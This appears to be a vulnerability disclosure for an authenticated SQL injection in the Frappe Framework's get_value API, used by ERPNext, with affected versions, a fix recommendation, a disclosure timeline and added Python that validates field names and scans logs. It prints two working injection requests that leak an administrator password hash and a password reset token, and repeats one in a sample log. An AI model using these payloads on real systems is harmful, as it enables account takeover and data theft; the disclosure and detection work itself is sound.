Introduction:
The Frappe Framework is a full stack web framework written in Python and JavaScript which is also the backend to ERPNext, a popular open-source Enterprise Resource Planning (ERP) platform. ERPNext is used by 30,000+ companies either locally hosted or as a Software as a Service (SaaS) offering by Frappe.
During some research, Cale discovered an authenticated SQL injection vulnerability in Frappe Framework, affecting the latest version of ERPNext, including cloud-hosted instances. The vulnerability could be used to leak sensitive information from the database including user password hashes and password reset tokens which could be used to compromise the application.
The vulnerability affects the following Frappe Framework Versions:
- <= 14.100.1
- >= 15.0.0 and < 15.100.0
The vulnerability was assigned CVE-2026-29081 with a CVSS score of 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).
The Vulnerability:
The fieldname parameter of the /api/method/frappe.client.get_value API endpoint was vulnerable to SQL injection due to insufficient sanitisation/parameterisation:

Any authenticated user could craft a malicious query to leak information from the database including password reset tokens, hashed passwords, and personal details.
The fieldname parameter could be escaped with a backtick (`) and arbitrary SQL could be injected with some conditions:
- The fieldname value had to match the allow list of valid field names for the doctype (e.g. name)
- The chosen fieldname had to also be a column in the table being leaked from
- The remainder of the query had to remain valid (no techniques were found to escape the rest of the query)
This could be exploited by extending the SELECT into a query against a different table and appending a UNION SELECT so that the remainder of the original statement stayed syntactically valid.
The payload and response below show the hash of the Administrator account being leaked from Frappe's cloud demo app, which could be cracked to take over the account:
GET /api/method/frappe.client.get_value?doctype=User&fieldname=name`,`password`+from+__Auth++where+name+like+%22Administrator%22+UNION+SELECT+`name`,`name&_=1770072146025
{"message":{"name":"Administrator","password":"$pbkdf2-sha256$29000$X8..."}}
The payload and response below show a password reset token being leaked from the Frappe cloud demo app, which could be used to reset the user’s password and take over the account:
GET /api/method/frappe.client.get_value?doctype=User&fieldname=name`,`reset_password_key`+from+tabUser+where+name+like+"ne%"+UNION+SELECT+`name`,`name&_=1770072146025
{"message":{"name":"...@frappe.io","reset_password_key":"CE4..."}}
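As an added defender-side example (not code from the advisory or from Frappe), the following Python enforces the strict fieldname check the vulnerable endpoint lacked and scans access-log lines for get_value requests whose fieldname is not a bare identifier. It assumes combined-format access logs and that the endpoint may also receive a JSON-encoded list of field names; the sample log lines are constructed, the third one carrying the advisory's first payload.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

IDENT_RE = re.compile(r"[A-Za-z0-9_]+")  # a bare SQL identifier
SQLI_MARKERS = re.compile(r"`|\bunion\b|\bselect\b|\bfrom\b", re.IGNORECASE)
GET_VALUE_PATH = "/api/method/frappe.client.get_value"
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')  # request target in a combined-format log line

def is_safe_fieldname(fieldname: str, allowed_fields: set) -> bool:
    """Server-side check: a bare identifier that is also in the doctype's allow list.
    Allow-list membership alone was evidently not enough (the advisory's payloads still
    satisfied it), so the identifier grammar is enforced first."""
    return IDENT_RE.fullmatch(fieldname) is not None and fieldname in allowed_fields

def suspicious_fieldnames(request_target: str) -> list:
    """Return fieldname values of a get_value request that are not plain identifiers."""
    parts = urlsplit(request_target)
    if not parts.path.endswith(GET_VALUE_PATH):
        return []
    hits = []
    for raw in parse_qs(parts.query, keep_blank_values=True).get("fieldname", []):
        # Assumed: get_value also takes a JSON-encoded list of field names; unpack it
        # so that a benign list is not reported.
        try:
            values = json.loads(raw) if raw.startswith("[") else [raw]
        except json.JSONDecodeError:
            values = [raw]
        for value in map(str, values):
            if IDENT_RE.fullmatch(value) is None or SQLI_MARKERS.search(value):
                hits.append(value)
    return hits

def scan_access_log(lines) -> list:
    """Apply the check to access-log lines; return (line_no, offending value) pairs."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            findings.extend((line_no, v) for v in suspicious_fieldnames(match.group(1)))
    return findings

# Constructed sample log: two benign requests, then the advisory's first payload.
SAMPLE_LOG = [
    '10.0.0.5 - - [03/Feb/2026:10:00:00 +0000] "GET /api/method/frappe.client.get_value?doctype=User&fieldname=name HTTP/1.1" 200 64',
    '10.0.0.5 - - [03/Feb/2026:10:00:01 +0000] "GET /api/method/frappe.client.get_value?doctype=User&fieldname=%5B%22name%22%2C%22email%22%5D HTTP/1.1" 200 90',
    '10.0.0.9 - - [03/Feb/2026:10:00:02 +0000] "GET /api/method/frappe.client.get_value?doctype=User&fieldname=name%60,%60password%60+from+__Auth++where+name+like+%22Administrator%22+UNION+SELECT+%60name%60,%60name&_=1770072146025 HTTP/1.1" 200 128',
]

if __name__ == "__main__":
    for line_no, value in scan_access_log(SAMPLE_LOG):
        print(f"line {line_no}: suspicious fieldname {value!r}")
```

Only the third sample line is reported; the JSON list on the second line is unpacked and passes because each element is a bare identifier.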
The vulnerability was tested against the following software:
- Frappe ERPNext 15.95.2
- Frappe Framework 15.98.1
- Frappe Cloud Demo App (https://erpnext-demo.frappe.cloud/app)
Recommendation:
All instances of software built on a vulnerable version of Frappe Framework should be updated to a fixed version.
Disclosure Timeline:
February 3rd, 2026: Issue reported to Frappe security team
February 11th, 2026: Issue acknowledged and private fix created
March 3rd, 2026: Draft security advisory issued
March 5th, 2026: Security advisory published and CVE-2026-29081 assigned